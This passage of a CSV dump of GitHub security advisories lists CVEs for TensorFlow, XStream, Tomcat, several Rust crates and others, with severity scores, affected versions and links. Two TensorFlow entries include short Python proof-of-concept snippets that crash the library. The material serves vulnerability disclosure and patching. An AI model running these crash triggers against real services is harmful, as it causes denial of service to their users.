'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gf88-j2mg-cc82'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37661'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8a84f7a2b5a2b27ecf88d25bad9ac777cd2f7992'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-681'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:23:52Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-wq8f-46ww-6c2h,2023-06-13T22:27:01Z,2021-08-25T20:43:49Z,,['CVE-2018-20989'],Integer underflow in untrusted,A mistake in error handling in untrusted before 0.6.2 could lead to an integer underflow and panic if a user of the crate didn't properly check for errors returned by untrusted. Combination of these two programming errors (one in untrusted and another by user of this crate) could lead to a panic and maybe a denial of service of affected software. The error in untrusted is fixed in release 0.6.2 released 2018-06-21. It's also advisable that users of untrusted check for their sources for cases where errors returned by untrusted are not handled correctly.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'untrusted'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20989'}, {'type': 'WEB', 'url': 'https://github.com/briansmith/untrusted/pull/20'}, {'type': 'PACKAGE', 'url': 'https://github.com/briansmith/untrusted'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0001.html'}]","{'cwe_ids': ['CWE-191'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-hph2-m3g5-xxv4,2022-02-08T20:44:04Z,2021-08-25T14:47:09Z,,['CVE-2021-39151'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39151](https://x-stream.github.io/CVE-2021-39151.html). + +### Credits +Smi1e of DBAPPSecurity WEBIN Lab found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-hph2-m3g5-xxv4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39151'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39151.html'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:27Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-vcjj-9vg7-vf68,2021-08-24T17:57:25Z,2021-08-25T14:39:54Z,,['CVE-2021-37688'],Null pointer dereference in TFLite,"### Impact +An attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service: + +```python +import tensorflow as tf + +model = tf.keras.models.Sequential() +model.add(tf.keras.Input(shape=(1, 2, 3))) +model.add(tf.keras.layers.Dense(0, activation='relu')) + +converter = tf.lite.TFLiteConverter.from_keras_model(model) +tflite_model = converter.convert() + +interpreter = tf.lite.Interpreter(model_content=tflite_model) +interpreter.allocate_tensors() + +interpreter.invoke() +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/internal/optimized/optimized_ops.h#L268-L285) unconditionally dereferences a pointer. + +```cc + if (y4 > 1) { + // ... + } else { + for (int i0 = 0; i0 < y0; ++i0) { + const T* input2_data_ptr = nullptr; + for (int i1 = 0; i1 < y1; ++i1) { + input2_data_ptr = input2_data_reset; + for (int i2 = 0; i2 < y2; ++i2) { + scalar_broadcast_f(y3, params, *input1_data_ptr, input2_data_ptr, + output_data_ptr); + } + } + } + } +``` + +### Patches +We have patched the issue in GitHub commit [15691e456c7dc9bd6be203b09765b063bf4a380c](https://github.com/tensorflow/tensorflow/commit/15691e456c7dc9bd6be203b09765b063bf4a380c). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vcjj-9vg7-vf68'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37688'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/15691e456c7dc9bd6be203b09765b063bf4a380c'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow/'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:57:25Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-352p-rhvq-7g78,2021-08-19T18:45:49Z,2021-08-25T20:52:55Z,,['CVE-2021-25904'],Null pointer deference in av-data,"An issue was discovered in the av-data crate before 0.3.0 for Rust. A raw pointer is dereferenced, leading to a read of an arbitrary memory address, sometimes causing a segfault.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'av-data'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25904'}, {'type': 'WEB', 'url': 'https://github.com/rust-av/rust-av/issues/136'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-av/rust-av'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0007.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:45:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-8rc5-mr4f-m243,2021-08-19T21:18:55Z,2021-08-25T20:46:57Z,,['CVE-2020-35876'],Use after free in rio,"An issue was discovered in the rio crate through 2020-05-11 for Rust. A struct can be leaked, allowing attackers to obtain sensitive information, cause a use-after-free, or cause a data race.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35876'}, {'type': 'WEB', 'url': 'https://github.com/spacejam/rio/issues/11'}, {'type': 'WEB', 'url': 'https://github.com/spacejam/rio/pull/31'}, {'type': 'PACKAGE', 'url': 'https://github.com/spacejam/rio'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0021.html'}]","{'cwe_ids': ['CWE-416', 'CWE-772'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:55Z', 'nvd_published_at': None}" +1.4.0,GHSA-hc92-9h3m-c39j,2021-08-18T21:32:29Z,2021-08-25T20:55:45Z,,['CVE-2021-38187'],Incorrect cast in anymap,An issue was discovered in the anymap crate through 0.12.1 for Rust. It violates soundness via conversion of a *u8 to a *u64.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'anymap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.12.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38187'}, {'type': 'WEB', 'url': 'https://github.com/chris-morgan/anymap/issues/37'}, {'type': 'PACKAGE', 'url': 'https://github.com/chris-morgan/anymap'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0065.html'}]","{'cwe_ids': ['CWE-681', 'CWE-704'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:32:29Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-q3cc-7p7g-392c,2021-08-19T21:08:56Z,2021-08-25T20:47:43Z,,['CVE-2020-35873'],Use after free in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated because sessions.rs has a use-after-free.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35873'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/commit/ac30e169ae51b262bc8cf7026469851ce39b23c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:08:56Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-83r8-p8v6-6gfm,2022-06-14T20:53:20Z,2021-08-25T21:00:20Z,,[],Slock allows sending non-Send types across thread boundaries,"`Slock` unconditionally implements `Send`/`Sync`. + +Affected versions of this crate allows sending non-Send types to other threads, +which can lead to data races and memory corruption due to the data race. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'slock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/BrokenLamp/slock-rs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/BrokenLamp/slock-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0135.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T17:28:42Z', 'nvd_published_at': None}" +1.4.0,GHSA-r2mj-8wgq-73m6,2021-08-31T21:14:36Z,2021-08-09T20:43:14Z,,['CVE-2021-23418'],XML External Entity Reference in Glances,"The package glances before 3.2.1 are vulnerable to XML External Entity (XXE) Injection via the use of Fault to parse untrusted XML data, which is known to be vulnerable to XML attacks. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Glances'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23418'}, {'type': 'WEB', 'url': 'https://github.com/nicolargo/glances/issues/1025'}, {'type': 'WEB', 'url': 'https://github.com/nicolargo/glances/commit/4b87e979afdc06d98ed1b48da31e69eaa3a9fb94'}, {'type': 'WEB', 'url': 'https://github.com/nicolargo/glances/commit/85d5a6b4af31fcf785d5a61086cbbd166b40b07a'}, {'type': 'WEB', 'url': 'https://github.com/nicolargo/glances/commit/9d6051be4a42f692392049fdbfc85d5dfa458b32'}, {'type': 'PACKAGE', 'url': 'https://github.com/nicolargo/glances'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-GLANCES-1311807'}]","{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:18:37Z', 'nvd_published_at': '2021-07-29T18:15:00Z'}" +1.4.0,GHSA-x67x-vg9m-65c3,2021-08-19T17:02:46Z,2021-08-25T20:55:27Z,,['CVE-2017-1000430'],Integer overflow in base64,"Affected versions of this crate suffered from an integer overflow bug when +calculating the size of a buffer to use when encoding base64 using the +`encode_config_buf` and `encode_config` functions. If the input string +was large, this would cause a buffer to be allocated that was too small. +Since this function writes to the buffer using unsafe code, it would +allow an attacker to write beyond the buffer, causing memory corruption +and possibly the execution of arbitrary code. + +This flaw was corrected by using checked arithmetic to calculate +the size of the buffer. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'base64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000430'}, {'type': 'WEB', 'url': 'https://github.com/alicemaz/rust-base64/commit/24ead980daf11ba563e4fb2516187a56a71ad319'}, {'type': 'PACKAGE', 'url': 'https://github.com/alicemaz/rust-base64'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2017-0004.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:02:46Z', 'nvd_published_at': None}" +1.4.0,GHSA-f5cx-5wr3-5qrc,2021-08-24T13:33:26Z,2021-08-25T14:42:26Z,,['CVE-2021-37662'],Reference binding to nullptr in boosted trees,"### Impact +An attacker can generate undefined behavior via a reference binding to nullptr in `BoostedTreesCalculateBestGainsPerFeature`: + +```python +import tensorflow as tf + +tf.raw_ops.BoostedTreesCalculateBestGainsPerFeature( + node_id_range=[], + stats_summary_list=[[1,2,3]], + l1=[1.0], + l2=[1.0], + tree_complexity =[1.0], + min_node_weight =[1.17], + max_splits=5) +``` + +A similar attack can occur in `BoostedTreesCalculateBestFeatureSplitV2`: + +```python +import tensorflow as tf + +tf.raw_ops.BoostedTreesCalculateBestFeatureSplitV2( + node_id_range=[], + stats_summaries_list=[[1,2,3]], + split_types=[''], + candidate_feature_ids=[1,2,3,4], + l1=[1], + l2=[1], + tree_complexity=[1.0], + min_node_weight=[1.17], + logits_dimension=5) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/stats_ops.cc) does not validate the input values. + +### Patches +We have patched the issue in GitHub commit [9c87c32c710d0b5b53dc6fd3bfde4046e1f7a5ad](https://github.com/tensorflow/tensorflow/commit/9c87c32c710d0b5b53dc6fd3bfde4046e1f7a5ad) and in commit. [429f009d2b2c09028647dd4bb7b3f6f414bbaad7](https://github.com/tensorflow/tensorflow/commit/429f009d2b2c09028647dd4bb7b3f6f414bbaad7). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-f5cx-5wr3-5qrc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37662'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/429f009d2b2c09028647dd4bb7b3f6f414bbaad7'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/9c87c32c710d0b5b53dc6fd3bfde4046e1f7a5ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:33:26Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-qhxh-9hhx-6p7v,2021-07-26T17:47:03Z,2021-08-02T16:59:35Z,,['CVE-2021-23408'],Prototype Pollution in GraphHopper,"This affects the package `com.graphhopper:graphhopper-web-bundle` before 3.2, from 4.0-pre1 and before 4.0. The URL parser could be tricked into adding or modifying properties of Object.prototype using a constructor or __proto__ payload.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.graphhopper:graphhopper-web-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23408'}, {'type': 'WEB', 'url': 'https://github.com/graphhopper/graphhopper/pull/2370'}, {'type': 'WEB', 'url': 'https://github.com/graphhopper/graphhopper/releases/tag/3.1'}, {'type': 'WEB', 'url': 'https://github.com/graphhopper/graphhopper/releases/tag/3.2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-COMGRAPHHOPPER-1320114'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:47:03Z', 'nvd_published_at': '2021-07-21T16:15:00Z'}" +1.4.0,GHSA-4vww-mc66-62m6,2022-02-08T21:20:44Z,2021-08-13T15:21:14Z,,['CVE-2021-33037'],HTTP Request Smuggling in Apache Tomcat,"Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-M1'}, {'fixed': '10.0.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.48'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.68'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33037'}, {'type': 'WEB', 'url': 'https://kc.mcafee.com/corporate/index?page=content&id=SB10366'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r290aee55b72811fd19e75ac80f6143716c079170c5671b96932ed44b@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r40f921575aee8d7d34e53182f862c45cbb8f3d898c9d4e865c2ec262@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r612a79269b0d5e5780c62dfd34286a8037232fec0bc6f1a7e60c9381%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc6ef52453bb996a98cb45442871a1db56b7c349939e45d829bf9ae37@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0dfea39829bc0606c936a16f6fca338127c86c0a1083970b45ac8d2@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re01e7e93154e8bdf78a11a23f9686427bd3d51fc6e12c508645567b7@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1b54fd3f52f998ca4829159a88cc4c23d6cef5c6447d00948e75c97@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/kovg1bft77xo34ksrcskh5nl50p69962'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00009.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-34'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210827-0007/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4952'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T19:38:16Z', 'nvd_published_at': '2021-07-12T15:15:00Z'}" +1.4.0,GHSA-7qfm-6m33-rgg9,2021-06-28T19:08:40Z,2021-08-13T15:21:59Z,,[],XML External Entity Reference,"An issue was discovered in service-api before 4.3.12 and 5.x before 5.1.1 for Report Portal. It allows XXE, with resultant secrets disclosure and SSRF, via JUnit XML launch import.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.epam.reportportal:service-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.epam.reportportal:service-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12642'}, {'type': 'WEB', 'url': 'https://github.com/reportportal/reportportal/blob/master/SECURITY_ADVISORIES.md'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-28T19:08:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-fqpx-cq8x-9wp4,2021-08-19T21:20:35Z,2021-08-25T20:46:03Z,,['CVE-2020-25796'],Unaligned references in sized-chunks,"An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the InlineArray implementation, an unaligned reference may be generated for a type that has a large alignment requirement.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sized-chunks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25796'}, {'type': 'WEB', 'url': 'https://github.com/bodil/sized-chunks/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodil/sized-chunks'}, 